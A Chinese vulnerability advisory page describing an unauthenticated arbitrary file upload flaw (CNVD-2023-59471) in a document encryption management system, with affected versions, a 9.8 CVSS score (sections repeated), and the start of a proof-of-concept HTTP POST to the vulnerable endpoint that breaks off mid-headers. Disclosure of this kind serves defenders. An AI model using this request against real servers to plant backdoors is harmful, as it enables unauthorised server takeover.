亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471

1.漏洞概述

    亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

                               CNVD:https://www.cnvd.org.cn/flaw/show/CNVD-2023-59471(目前未公开)

2.影响版本

        <= V5.x


3.漏洞等级

        严重
        cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

        cvss-score: 9.8

2.影响版本

        <= V5.x


3.漏洞等级

        严重
        cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

        cvss-score: 9.8


4.漏洞复现

POC:


  
  1. POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1

  2. Host: { {hostname}}

  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

  4. Connection: close

  5. Content-Length: 6

  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=

最近更新

  1. TCP协议是安全的吗?

    2023-12-20 00:46:02       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-20 00:46:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-20 00:46:02       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-20 00:46:02       20 阅读

热门阅读

  1. 【缓存】一、Redis的基本使用与Redisson分布式锁

    2023-12-20 00:46:02       24 阅读
  2. 用VBA冻结excel文件的sheet1工作簿的第一行

    2023-12-20 00:46:02       39 阅读
  3. window.open的使用

    2023-12-20 00:46:02       39 阅读
  4. 【MySQL】数据类型

    2023-12-20 00:46:02       90 阅读
  5. 【难点】【LRU】146.LRU缓存

    2023-12-20 00:46:02       43 阅读
  6. 如何在Go中向错误中添加额外的信息

    2023-12-20 00:46:02       43 阅读
  7. C51--小车——PWM调速

    2023-12-20 00:46:02       35 阅读